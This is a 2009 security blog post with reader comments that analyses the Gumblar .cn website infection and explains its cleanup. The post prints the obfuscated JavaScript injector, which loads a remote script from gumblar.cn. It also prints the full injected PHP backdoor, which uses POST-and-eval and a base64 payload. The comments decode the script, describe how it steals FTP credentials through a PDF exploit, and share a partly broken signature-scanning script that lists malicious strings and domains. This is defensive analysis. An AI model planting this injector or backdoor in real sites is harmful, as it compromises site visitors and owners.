msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Gumblar .cn Exploit – 12 Facts About This Injected Script

   07 May 09   Filed in Website exploits

I’ve been watching this exploit for about a week now.  During the last couple of days it became the prevailing problem detected by Unmask Parasites.

I don’t have reliable information about how the infection occurs. However I have compiled a list of facts that might be useful if you are fighting this exploit.

1 Infected web pages contain a script that looks like this

(function(jil){var xR5p='%';e val(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

2 Every infected site has it’s own modification of the script. However every modification has common parts and can be easily identified as the gumblar .cn script.

  1. The script starts with “(function(
  2. The function has no name.  It is anonymous and self-invoking.
  3. The script is obfuscated. I.e. some characters are replaced with  their numeric codes, and then the “%” character replaced with some orbitrary character. Here are some sample excerpts of the encrypted data: “…20a.3d.22Sc.72iptEngin.65…“, “…~76ar~20a~3d~22Scr~69~70~74En~67~69ne…“, “…v_61_72_20_61_3d_22_53_63rip_74E_6e…
  4. Near the end of the script there is a “.replace(” function
  5. If the function accepts parameters, at the very end you’ll find a simple regular expression like /”/g or /~/g, etc. that will decrypt the mangled “%” character.

3 When the script is executed (every time someone visits the infected web page),  another script from “gumblar . cn/rss/” is silently loaded and executed.

4 This code is usually injected right before the <body> tag.  I saw a web page with eight(!) <body> tags (yeah, invalid HTML) and the gumblar scripts were injected before each of them.

5 Sometimes I encounter this script on sites infected with the malicious iframes that I reviewed in my recent posts. So this exploit may use the same infection technique. And probably the same clean up steps may be applied.

6 Unlike the recent iframe exploits, where the malicious code was only injected into files with most common filenames (e.g. index.html, index.php, etc.) this gumblar script is injected into every web page.

7 This script is also injected into .js (JavaScript) files. Usually at the very bottom.

8 Maybe it’s just a coincidence but about 95% of the infected sites used PHP. It is not possible to say for sure if the rest sites used PHP. Who knows.

9 This exploit doesn’t use some particular script vulnerability. I encountered it on phpBB, SMF and vBulletin forums, on WordPress 2.7.1 blogs, on proprietary PHP sites.

10 Some people reported that the following code is injected into PHP files:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL',base64 _decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBFb0xTPSd2YXI8MjBhPDNkPDIyUzw2M3I8NjlwdDw0NW5naTw2ZWU8MjI8MmNiPDNkPDIyVmVyczw2OW88NmUoKSs8MjI8MmNqPDNkPDIyPDIyPDJjPDc1PDNkPDZlYXZpZ2F0b3I8MmV1czw2NTw3MkFnZW50PDNiaWYoKHU8MmVpPDZlPDY0ZXhPZig8MjJXaW48MjIpPDNlMCk8MjY8MjYodTwyZWluZGV4Tzw2NjwyODwyMjw0ZVQ8MjA2PDIyKTwzYzApPDI2PDI2KDw2NG9jdW1lPDZldDwyZWNvbzw2YmllPDJlaTw2ZWRleDw0ZmYoPDIyPDZkaTw2NTw2YjwzZDE8MjIpPDNjMCk8MjY8MjYodDw3OXA8NjVvZih6cjw3Nno8NzRzKTwyMTwzZHR5cGU8NmZmKDwyMjw0MTwyMikpPDI5PDdiPDdhcnZ6dHM8M2Q8MjJBPDIyPDNiZTw3NmFsKDwyMmlmKHc8NjluZG93PDJlPDIyK2ErPDIyKTw2YTwzZDw2YSs8MjI8MmJhKzwyMjw0ZGFqb3I8MjI8MmI8NjI8MmI8NjErPDIyTWlub3I8MjIrYis8NjErPDIyPDQydTw2OWxkPDIyPDJiYjwyYjwyMmo8M2I8MjIpPDNiZG9jPDc1bWVudDwyZXdyaTw3NGU8Mjg8MjI8M2NzPDYzcjw2OXB0PDIwczw3MmM8M2Q8MmY8MmZndTw2ZDw2Mmw8NjFyPDJlY248MmZyczw3MzwyZjwzZmlkPDNkPDIyK2orPDIyPDNlPDNjPDVjPDJmPDczY3JpcHQ8M2U8MjIpPDNiPDdkJzt2YXIgQ2l6PUVvTFMucmVwbGFjZSgvPC9nLCclJyk7ZXZhbCh1bmVzY2FwZShDaXopKX0pKCk7CiAtLT48L3NjcmlwdD4='));
function tmp_lkojfghx($s){ if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0] as $v) if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v) || preg_match('#[\(\[](\s*\d+,)20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos;($v,'[removed]')))$s=str_replace($v,'',$s);}
$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
if(stristr($s,'<body')) $s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')
$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?>

The base64-encoded part is this gumblar .cn script.

This PHP code, it’s structure and variable names (tmp_lkojfghx, tmp_lkojfghx3, TMP_XHGFJOKL) are the same as in the infamous fake Yahoo counter exploit. Only the injected javascript is different. Maybe it was created by the same people, or maybe just the same exploitation kit was used.

11 This is not a server-wide exploit. I checked several servers with infected sites. Most of the neighbor sites were clean.

12 Gumblar .cn domain is currently blacklisted by Google.

Removal

Most likely this exploit is caused by compromised FTP credentials. So start with your own computer. Scan it for spyware. Some people reported good results with Malwarebytes.

Then (from a clean computer) change FTP passwords.

Try not to store them inside programs that you use to upload files to a server.

Whenever possible use secure connections. I.e. use SFTP instead of plain FTP. Many shared hosting plans include SFTP.

Finally, remove the malicious code from all server files (.html, .php, .js, etc.). The easiest way to do it, is replace them with clean files from a backup.

If you have more facts about this exploit, please post them in the comment section below.

May 10, 2009. Update…

Round Up of the Comments

The comments section of this blog post contains a lot of additional useful facts from webmasters of infected sites.  Be sure to read them.

Zork noticed that his site’s .htaccess file was modified

Jason talks about what this exploit does from a visitors point of view. Of course a visitor can be a webmaster of another site.

adel sarlak mentioned that this exploit also adds image.php files into image directories. It can also change directory permissions.

James also elaborates on the scripts in image.php and some other .php
files. He suggest a shell command to find infected files.

C Filorux shared information about a POST-and-eval backdoor script found on an infected site.

rad-one posted a PHP script that scans all files from your site looking for the exploit signatures.
It looks incomplete and you might need to finish it before using.

Another removal instructions from Neil Williams.

Great comment from web host LarryL who deliberately infected a PC to find out how this virus works. With this information, he suggests re-infection preventing strategy.

Thanks for sharing this info. If anyone wants to publish an article about how they fought the infection or the impact of the infection, please contact me – I can publish it here as a guest post. I’m also looking for “hardening a website” tips and tricks.

P.S. I suggest that you use Unmask Parasites to check if you site is infected. It’s safe and fast.

Similar posts:

Reader's Comments (194)

  1. |

    Hello,

    Thanks for your explanation about this, it has already infected 3 of my websites, I use phpfusion cms, 68classifieds and cubecart, I must say they people over at 68classifieds are really spot on with their help, just like your blog here,

    I have run a full virus scan and malware scan on my pc but only picked up cookies, I will change my ftp and will post back my results.

    Thank you so much for your help with this exploit.

  2. |

    One of our web hosting customers is having a problem with gumblar.cn on several of her websites. She noticed that all of the her websites containing this infection had a web counter, and we both suspect that the counter script was used as a back door to gain access to the other files on the website. She’s going to remove the counter scripts and see if these attacks stop.

    • |

      As I mentioned in #9, this is not some particular script vulnerability. I saw many infected sites that didn’t have any web counters at all.

  3. |

    Hi.
    I confirm Your point 10. – i had this php code injected.
    This exploit also creates/edits .httaccess files – sets

    “Options -MultiViews
    ErrorDocument 404 /158612.php

    and (random_number).php contains some strange PHP code.

    What suprised me – when i entered site infected by this sh#t Kaspersky didn’t noticed ANYTHING.

    • |

      Thanks for sharing this info.

      Did you have that 158612.php file on a server?

      Could you send it to me?

      I just check 404-error pages on some (not mine) infected sites and they were regular “Not found” pages. Nothing suspiciuos.

  4. |

    oh, i forgot to mention something – i suppose that it could also have some connection with CHMODE set to 777…
    For security purpose I’ve changed FTP passwords.

  5. |

    When you inadvertently load an infected page, it redirects you to the gumblar webpage, and it pushes a pdf file to your computer. If you’re running an earlier version of Adobe Reader (such as 7 or unpatched 8), it exploits a known Adobe Reader vulnerability, and gets access to your PC. From there, it looks for common ftp clients, (for me this was FileZilla) grabs any stored passwords, and sends them home. While it’s there, it seems to disable regedit, cmd, and can disable virus scanners. The passwords that were sent home are then used to infect your websites, and the cycle continues the next time another webmaster browses across your site.
    So clean up your own PC as suggested, upgrade Adobe Reader, and hopefully you kept backups of your websites!
    Cheers,
    Jason.

    • |

      Correction to my own post… it affects ALL current versions of Adobe Reader. Adobe claim there aren’t any known exploits of this (well there are now!), and haven’t fixed it yet. Workaround is to disable Acrobat Javascript through Edit Properties in Acrobat Reader itself. There is a checkbox in there to turn it off, which stops the malicious PDF from doing any harm on your PC, which stops it getting your FTP passwords, which stops it hacking your websites.
      Also forgot to mention changing your FTP passwords immediately using a clean machine.
      Cheers,
      Jason.

  6. |

    Decrypted, the shellcode above (the script youve provided) says this (runs js eval() command on this):
    var a=”ScriptEngine”,b=”Version()+”,j=”",u=navigator.userAgent;if((u.indexOf(“Win”)>0)&&(u.indexOf(“NT 6″)<0)&&(document.cookie.indexOf(“miek=1″)<0)&&(typeof(zrvzts)!=typeof(“A”))){zrvzts=”A”;eval(“if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);document.write(”

    There is nothing after that. It ends with document.write(“. Likely not complete script/possibly where other script takes into effect. It looks like its just taking information about a users computer based on the user agent.

    • |

      >There is nothing after that

      You’ve probably tried to output the result to a web browser window. The next character is “<” and unless you escape it, a browser will omit the rest text.

      • |

        The rest of the data after “write(” is:
        write(“”);}’).replace(jil,xR5p)))})(/%/g);

        • |

          Hehe…I’ll try this again with some substitution…
          write(“LESS_THAN_SIGNscript srcEQUALS//gumblar.cn/rss/?id=”+j+”GREATER_THAN_SIGNLESS_THAN_SIGN\/scriptGREATER_THAN_SIGN”);}’).replace(jil,xR5p)))})(/%/g);

  7. |

    My website was also infected by gumblar.cn

    I ran a scan, reformatted my computer, changed passwords, uploaded clean code, uploaded clean database – website was clean for 1 day and then was hacked again.

    The second time we were hacked, it was reffering to hotican . cn – a new site, same problem, same people I am sure.

    I use godaddy – have met a bunch of other people with the same issue, they were also using godaddy. Does this have any truth?

    Godaddy says that the ftp username / password are comprimised – I assume it is possible to get this info from a scripting vulnribility, as no one could have access to this info.

    • |

      The original exploit could have left backdoor scripts and/or changed file/directory permissions.

    • |

      I use godaddy too. Told them about this on May , 7, 8, 9th, May 10, May 11 and May 12. Finally got someone to listen when I told them…..I’m not the only one on godaddy with this issue. My problem started May 6th. I believe the virus started April 22nd. I’ve sent them screen shots and everything…

      • |

        i am also using godaddy and i am also getting same problem first of all i got this problem on 25 th april and afatr that i cleaned my site but agai on 15th i got the same eroor again

  8. |

    Hi !

    I had the same problem with our Website.
    I am almost sure, infection does not happen on the server but on the client which does the upload.

    But up to now i do not know which program does insert the scripts.

    In our case only HTML files were infected.

    But I use some php scripts, but read from a file and allow some input. This code have been entry point for an injection.

    Sophos Antivirus knows detects the malicious script as

    Troj/JSRedir-R

    Michael

  9. |

    I found this virus 10 days ago and 4th of my customers got it .

    We removed it more than 10 times but the next day amazingly it was on all pages again .

    I found the source file .

    I each “Images” folder in your site it will copy a php file “image.php” .

    Before removing the script from pages , you must rewrite a same file instead of image.php and change the permissions .

    Then remove the scripts .

    If your site gets the iframe version as fast as you can , you must remove the iframe then replace the image.php .

    Because google may consider your site as a harmful site .

    Another thing is that , in cms sites i changes the permissions of template folders !!!

  10. |

    We got this malware uploaded via FTP credentials. A PHP page on the same site was infected with a POST-and-eval backdoor, also by bad FTP credentials.

  11. |

    I checked on google – my infected site has some “strange” files since… 1st april!

    query google: site:prettyone.pl

    it has to be connected with these .httaccess – I hope now site is clean (chmode 755, changed passwords etc.)

  12. |

    Enough files that I have found infected by this. I am unable to find the code you mentioned in my PHP files. But let me tell I use fact no. 10 given in your blog. And I am also able to remove iframe for bigtruckstopseek .cn/ts/in.cgi?banner2. Your blog is very helpful.

  13. |

    موقعي مصاب بهذا الفيروس . بوجهة نظركم ماهو الحل

    السليم لتفادي هذه المشكله العظيمه . فهي مصابه

    اكثر المواقع بها ولانرى اي حل . سوى الحظر من قوقل

    وغيره . فما هو الحل ؟

  14. |

    I can confirm it has attacked a 1.3.7 version zencart

  15. |

    This is a bit offtopic, but considering twitter has serious vulnerabilities like this one news.cnet.com/8301-1009_3-10222373-83.html?part=rss
    which may be just the tip of the iceberg I find it rather ironical that unmaskparasites should be patronizing twitter ( as it is there are many people are either bored or hating this service, and practically a very small fragment of this site’s usres actually use it )
    For example, will unmaskparasites ask us to visit gumblar.cn to get udates of unmaskparasites. NO ! Then why twitter?
    Let us get rid of this brand slavery too.
    I think a brilliant site this can stand on its won.

    • |

      I use twitter for what it was designed – for microblogging. Sometimes I want to share information that is not enough to make a real blog post. So I use Twitter.

      On twitter, I announce new blog posts, minor Unmask Parasites updates, sometimes other news that I think are worth sharing.

      If you don’t trust links I post (especially shortened ones: tinyurl, snurl, etc.), you can always check them with Unmask Parasites. This way you will see where they actually link to and whether those pages have security issues.

      You can folow me @unmaskparasites

  16. |

    I am unable to remove following script which appended after the body tag. I remove it but it got added when I refresh page to check :(

    And if I see file, this code is not presented. Seems added on runtime. Please suggest solution for it.

    Thanks,

    Edit by Denis: I’ve removed your site from your signature since it’s still infected
    http://www.UnmaskParasites.com/security-report/?page=www.pakzilla.com

    • |

      Tahir,

      Did you clean your computer and change site passwords?

      Did you also check file and directory permissions? There are reports that they are changed to 777 and 666 so anyone can create/modify arbitrary files.
      Check all wordpress .php files for suspicious code.

      • |

        How I am doing to remove this threat is:

        - remove malicious code from image.php file from all images folder
        - look for iframe code added on the top or bottom of php page – remove it
        - hunt out all php, js and html filess for added anonymous javascript methods.
        - put dir permission to 755
        - especially look for wp-include/all js files. I found all files infected with injected js anonymous methods.

        still going….

        • |

          Please check your .htaccess files. There is a comment saying they add some rules there.

          I’d suggest that you remove all files and directories and then reinstall WordPress from stratch. This way you can be sure you haven’t missed any backdoor scripts. It will be like an upgrade from v2.7.1 to v2.7.1. Just leave your wp-config.php file and wp-content directory (you’ll need to check them manually) to preserve your blog content.

          And don’t forget to change passwords every time you remove the malicious code.

          • |

            Thank you! Thank you! very much Denis.

            I just run your scan http://www.UnmaskParasites.com/security-report/?page=pakzilla.com and it has given me green signal.

            What I did is manual removal of code from my Plesk control panel and I change my ftp password but didnt use it.

            I also run scan with AVG Anti-Virus and Malwarebytes Anti-Malware.

            Your support has made my day. I will try to follow all security guidelines to prevent it.

            Thumbs up!

  17. |

    Posting here a PHP script that scans all files from your site looking for the exploit signatures. Usefull to see the files affected. Some false positive results may be returned for “(function(){” string search.

    Place file on site root folder. And use $excludes_array to exclude false positive files.

    ‘);

    $dirs_array = array();

    if ($handle = opendir($dir)) {

    echo “Open dir: ” . $dir . “”;
    echo “Files:”;

    // this is the correct way to loop over the directory.
    while (false !== ($file = readdir($handle))) {
    if ($file != ‘.’ && $file != ‘..’) {

    $path = $dir . $file;

    if (is_file($path)) {

    // skip large files
    if (filesize($path) > 1000000) {
    continue;
    }

    // exlude fieles
    if (in_array($path, $exclude_files)) {
    continue;
    }

    // get content
    $file_handle = fopen($path, “r”);
    $contents = ”;
    while (!feof($file_handle)) {
    $contents = fgets($file_handle);

    // loop for search string
    $found = false;
    foreach ($search as $search_string) {
    if (stristr($contents, $search_string)) {
    $found = true;
    break;
    }
    }

    if ($found == true) {
    echo ‘‘ . $path . ‘ … ‘;
    echo ‘[FOUND ' . $search_string . ']
    ‘;
    echo “”;

    break; // break while
    } else {
    //echo ‘[CLEAN]‘;
    }

    }

    fclose($file_handle);

    } elseif (is_dir($path)) {

    $dirs_array[] = $path;

    }
    }
    }
    closedir($handle);
    }

    foreach ($dirs_array as $dir) {
    scan_files($dir . ‘/’);
    }

    unset($dirs_array);
    }

    $start_dir = $_SERVER['DOCUMENT_ROOT'] . ‘/’;

    echo ‘Starting from: ‘ . $start_dir . ”;

    scan_files($start_dir);

    ?>

  18. |

    Missing file header

    ‘);

    $dirs_array = array();

  19. |

    set_time_limit(0);

    $exclude_files = array(
    $_SERVER['DOCUMENT_ROOT'] . ‘/’ . file_checker.php’,
    );

    function scan_files($dir) {

    global $exclude_files;

    // malware strings to search
    $search = array(
    ‘.cn/’, ‘gumblar’, ‘eval(unescape’, ‘eval(base64_decode’, ‘eval(decode’, ‘eval(base’, ‘base64_decode’, ‘(function(){‘, ‘eval(String.fromCharCode’,
    ‘neglite.com’, ‘niklejo.net’, ‘internetcountercheck.com’,);

    $dirs_array = array();

  20. |

    One other thing that I don’t see here is that the script adds image.php scripts to many of your image directories. It appears to target specifically directories called “images,” at least on my server. I’m guessing it probably searches for “image” as well.

    Also, it seems to target .php or .inc with the strings “database,” “settings,” or “config” in them.

    This has been particularly annoying to clean out and it’s been hitting my server the last week or so.

    My server has Drupal and Phplist installed, along with some other scripts I wrote, and most of them were infected, so I’m beginning to wonder if this isn’t a bug with php itself and not necessarily a specific application.

    • |

      Also, just to be safe, make sure you’re not deleting legitimate image.php files from your server since some scripts occasionally use them.

      I’ve found the easiest way to find what was infected was to log into a shell and run find. I noticed that the modified times of the files all fall reasonably close to each other, so you can run something like this:

      find . -mmin -60 > virus.log

      which will tell you what has changed in the last 60 minutes in all your directories.

      Having said that, I still haven’t been able to identify where the culprit is coming from, even looking at my access logs.

  21. |

    This is how i`m removing at the moment

    Removing Gumblar.cn

    If you have a backup of your website upload over the old website, if not login with Dreamweaver etc and find and remove following,

    • Any image folder containing image.php remove, only image folders nothing else
    • Download(get) entire site and first do a search on entire site for unescape this malicious code is normally placed in the beginning of php and end of javascript pages, remove all instances
    • Search again for iFrame src and any weird links remove, be careful just to remove the iframe links
    • Download and install malware malbytes from here http://www.malwarebytes.org , update the software and run in safemode (press f8 on startup) and remove all malware
    • Downloand and run avast or avg and execute a full virus scan and remove any viruses from you computer
    • Update Adobe acrobat reader to version 9.1 download and install here http://get.adobe.com/uk/reader/ , malicious code has been know to use old versions of adobe
    • Next login to your hosting account and change ftp password for your website, use symbols if possible
    • Change ftp password in Dreamweaver etc
    • Download Google Chrome to test your site, if it still has Gumblar.cn the browser will tell you. Get it here http://www.google.com/chrome

    Always keep your computer updated with malware and antivirus software, use zonealarm as a firewall and only use one computer to ftp.

    • |

      I’d suggest that you remove passwords from Dreamweaver instead of just changing them.

      To test your site you can use my Unmask Parasites online service. It’s more safe that using Google Chrome (there may be malicious scripts that load code from sites that Google hasn’t identified as malicious yet).

      I also suggest using FireFox 3 with the NoScript plugin (Never use the “allow all this page” option. If you need scripts, allow trusted domains one by one. This way your browser will never load external scripts and iframes with trojans).

      • |

        Thanks Denis for your excellent advice about this issue,I have also noticed that when I look at an infected site with ff or IE the virus is downloaded and automatically starts Adobe updater, Zone alarm blocked this just after entering a known hacked site.

        This is what it blocked.
        Product name Adobe Updater
        File name C:\Program Files\Common Files\Adobe\Updater6\Adobe_Updater.exe
        Last policy update Not applicable
        Version 6, 2,0, 1474
        Last modified date 08/01/2009 07:36:42
        File size 2462 KB

        I hope this helps, and any advice about this would be greatly appricated, I have updated my adobe reader to version 9.1, do I delete this file ?? Does Adobe know about this ?

  22. |

    Hello,

    I found my server infected with the same malware,

    i found all default.html , index.html /htm
    and index.php , db.php and similar php , like includefiles.php infected with the same.

    removed everything manually.

  23. |

    I am non-techie but I believe I got hit. I noticed this morning that the browsers (Google/Mozilla and Explorer) on my Home PC were extremely slow to endless when moving from one page to another. I shut down my PC several times, until suddenly I noticed a “waiting for gumblar.cn” appearing in the left bottom. I was suspicious, Googled it and found your blog.
    I remember that this morning an Adobe upgrade popped up (I forget which) so I clicked it. Then it prompted me to also download free Norton spyware, which I declined because I ahve the Norton suite installed. I am thinking now that the Adobe download could have been the fake that got gumblar.cn onto my PC. Any suggestions on how to remove it? Shall I delete all Adobe versions on my PC? Since I am non-techie, shall I call a techie to come to my house?

  24. |

    I had the same problems with gumblar and tried a bunch of different things, but the only thing that worked is what Jason wrote. It uses Adobe/Acrobat reader…If you disable javascript in adobe you should be ok. Also, erase all private data after each session in your ftp program.

  25. |

    Hi, I got this problem on some of my websites. The whole thing, even the iFrames. I was able to remove all of the bad code except the

    “(function(jil){var xR5p=’%';ev…”

    script on two of my sites. Both sites are WordPress 2.7.1

    I can’t find the file or files where this code was inserted. I replaced every file with a clean backup but it’s still there. Any help would be appreciated.

    I was able to clean a myBB installation, by uploading a clean backup. With WP, this is not working.

    I removed Adobe Reader, changed FTP-Passwords,
    ran severeal anti-virus tools. Hope my system is clean now.

    It seems to me that we’re dealing with a group of exploits wich all behave a little bit different on each webserver. (i.e. three WP installs, one able to clean, the other two: WTF?!)

  26. |

    hello,

    first, my vbulletin was “hacked” with this… than it was also on my joomla core and I had to edit all files^^ very time wasting work…

  27. |

    here is my script which i changed a little:

    i works perfectly:

    <?php
    set_time_limit(0);

    $exclude_files = array(
    $_SERVER['DOCUMENT_ROOT'] . '/' . file_checker.php’,
    );

    function scan_files($dir) {

    global $exclude_files;

    // malware strings to search
    $search = array(
    '.cn/',
    'gumblar',
    'eval(unescape',
    'eval(base64_decode',
    'eval(decode',
    'eval(base',
    'base64_decode',
    '(function(){',
    'eval(String.fromCharCode',
    'neglite.com',
    'niklejo.net',
    'internetcountercheck.com'
    );

    $dirs_array = array();

    if ($handle = opendir($dir)) {

    echo "Open dir: " . $dir . "";
    echo "Files:";
    echo "";

    // this is the correct way to loop over the directory.
    while (false !== ($file = readdir($handle))) {
    if ($file != '.' && $file != '..') {

    $path = $dir . $file;

    if (is_file($path)) {

    // skip large files
    if (filesize($path) > 1000000) {
    continue;
    }

    // exlude fieles
    if (in_array($path, $exclude_files)) {
    continue;
    }

    // get content
    $file_handle = fopen($path, 'r');
    $contents = ”;
    while (!feof($file_handle))
    {
    $contents = fgets($file_handle);

    // loop for search string
    $found = false;
    foreach ($search as $search_string) {
    if (stristr($contents, $search_string)) {
    $found = true;
    break;
    }
    }

    if ($found == true) {
    echo '' . $path . ' … ';
    echo '[FOUND ' . $search_string . ']';
    echo "";
    break;

    }
    else {
    //echo ‘[CLEAN]‘;
    }

    }

    fclose($file_handle);

    } elseif (is_dir($path)) {

    $dirs_array[] = $path;

    }
    }
    }
    closedir($handle);
    }

    foreach ($dirs_array as $dir) {
    scan_files($dir . '/');
    }

    unset($dirs_array);
    }

    $start_dir = $_SERVER['DOCUMENT_ROOT'] . '/';

    echo 'Starting from: ' . $start_dir . ”;

    scan_files($start_dir);

    ?>

    • |

      Hi,
      Mike I put your code to php file and put it to my web’s root on sever.
      And when i open it in my browser I got error:

      Parse error: syntax error, unexpected T_FUNCTION, expecting ‘)’ in /var/www/…../file_checker2.php on line 21

      or I do smth. wrong?

      Thank U!

      Edit by Denis: I removed your site from your signature since it still contains malicious iframes.

      • |

        Oleksandr,

        There seems to be several bugs in the script (probaly introduced by my WordPress commenting system that replaces two single quotes with one double quote character.)

        I was able to run this script when I replaced all single quotes (‘) with double quotes (“) and added missing quotes in lines like this:
        $contents = ”;

        Note, that the script returns many false positives (e.g. base64_decode in legitimate WordPress files and (function(){ in legitimage .js files).

        • |

          Could you post the fixed script please?

          • |

            The script is not very useful. It just lists file where it finds suspicious strings. Too many false positives.

            It’s much more easy to remove all files and then restore them from a clean backup.

  28. |

    We had this problem on our of our sites. Don’t know where it came from. Avast! instantly recognized it. ZoneAlarm doesn’t see it.

    To fix it, I deleted the swobject.js file which seemed to be where it was coming from. We also had to delete malicious code from index.php and an html header file. It seems to be okay right now. I will update. I have also changed ftp password. It’s also fixed a weird error I was getting in cpanel. Unsure if it’s related.

    Thanks for the help!

  29. |

    Hey,

    ALL .htm and .html pages on my server have been affected. I haven’t checked an script or php files yet :-\
    Will have to manually edit 100+ files :-(

  30. |

    On clicking the RSS link besides the star icon at the top of this page, AVG stops and sets a red alert – please see the picture –
    http://img26.imageshack.us/img26/2639/rsslinkproblem.jpg

    • |

      Thanks for reporting the problem.

      “feeds2.feedburner.com” site is a Google’s feed burning service used by millions of other blogs. The RSS feed itself is just my blog’s content without design element (raw content).

      I suspect that AVG detected samples of malicious code (non-executable) that I post in my articles and decided it was active.

      I couldn’t find anything suspicious in my RSS feed.

      I’ll need to investigate this issue though. Thanks

      • |

        Thanks. The problem is that it won’t simply allow me to subscribe.

        Regarding the microblogging thanks for your explanation. I find much easier to follow one site ( for example this site ) rather than to follow dozens of sites like twitters etc.

        I believe that many users feel the same way – there is simply no need to visit potentially problematic sites ( I may not be warned, better to be pro-active ) when short notices on this site or via subscriptions suffice.

        Of course its your choice :)

  31. |

    I’m a web host. Two of our customers have been hit by this so far. The gumblar code is propagated by infected websites. It will embed itself on your computer, search for usernames/passwords, and send them to the gumblar.cn site. They use this information to place the javascript code into all of the html files on your website. I verified this by purposely infecting a PC with bad credentials stored in Filezilla, then watching the login failures as they attempted to use them. The infected PC constantly attempts to connect to gumblar.cn – you can verify this with netstat from the command line.

    In my testing Avaya and Chrome both detect the gumblar code in html files – AVG and Kaspersky have not (as of now). I fixed the infected system with the ComboFix program that is used on the Tech Guy forum.

    Fixing the html files on a website is a tiresome manual process which could be automated pretty easily with a little bit of work.

    The keys to preventing re-infection are to get the thing off your local PC, to get the javascript out of the html files on your site, and to rename images/images.php to something else and replace it with another images.php with such permissions that it can’t be modified or overwritten.

    • |

      “you can verify this with netstat from the command line.”

      How? I sit possible to detail the exact steps please?

      • |

        Assuming Windows:

        Start/Run
        Type cmd and press Enter
        In the command box type netstat and press enter

    • |

      How did you infect a pc and how can I tell if a pc has actually been infected without checking netstat? I have the problem with only one of my clients so I guess it is not my pc that has been infected.

  32. |

    My website has also been infected with the same virus. I followed the instructions to clean up 100+ files last night. When I checked my website using Unmask Parasites, it says that my website is clean. The detailed report is linked to:

    http://www.google.com/safebrowsing/diagnostic?site=www.itxdepot.com

    When I use Google Chrome to open my webpage, I still get the warning message. When I open my webpage and view the sourcecode, the code still shows the infected script.

    I checked the server site and all of the files which I cleaned up did not come back with any infected script.

    This situation sounds similar to Tahir’s but I still can’t solve this problem.

    Can anyone help me with this problem?

    • |

      The reason why Unmask Parasites doesn’t say your site is infected is you only checked the home page, which is clean. However it redirects to “/xcart/index.php” and that page is infected and Google Chrome detects this.

      If you explicitly check that page, Unmask Parasites detects the suspicious script as well:
      http://www.UnmaskParasites.com/security-report/?page=www.itxdepot.com/xcart/index.php

      • |

        Thanks for the reply Denis. Yes, I did check the files before I post the help. None of the files infected with the code again on the server side(after I cleaned up last night).

        But for some reason it will added code back to the pages and display on the client side only. I did every steps same as the Tahir’s posting. I don’t know what I’m missing :(

        • |

          We just found out that we missed one PHP file that we did not clean up last night. Now, everything is on the right track. Thank you very much for your site. Without all of the tips from your site, I don’t know how long it would have taken me to fix the problems.

    • |

      got hit with this one myself on a clients machine… – gotta clear the tmp stored versions of the index, home, main, …etc. in the CNF or CTF (something like that) folder on server side, thats where the cached versions are located that the browsers pull … or so i think anyways, good luck staying our of gumblars path – hes a son of a gun

  33. |

    [...] Kristi wrote a guest blog post at TechJaws about the attack last weekend on her well known Kikolani Blog on the Art of Blogging by the PHP Script Injection Exploit in WordPress 2.7.1.  Kristi explains how she restored her blog and dealt with the issue. The UnMask Parasites blog provides additional details on what is known about this particular malware which has been dubbed the Gumblar .cn Exploit. [...]

  34. |

    We have had this virus now for 1 month. We believe it came through one of our wordpress sites. They saw that we stored all of our passwords and logins on dreamweaver for our 50+ sites.

    All sites are infected with this virus, we remove daily. Google bans these sites and you lose traffic and ultimately business.

    WE have to pay a full time web developer to keep looking for them and remove them manually every day.

    WE are almost ready to move all sites to a new dedicated server.

    SOlutions I have heard.

    Change FTP. We have done
    Format computer . We have done.
    Remove all viruses. We have done.
    Backup site to 1 month before virus was infected. we have done.

    Nothing left to do. This is killing us.

    • |

      And you still store passwords in dreamweaver?…

      • |

        No, we stopped storing passwords but it is using up our staff resources deleting this virus every 24 hours.

    • |

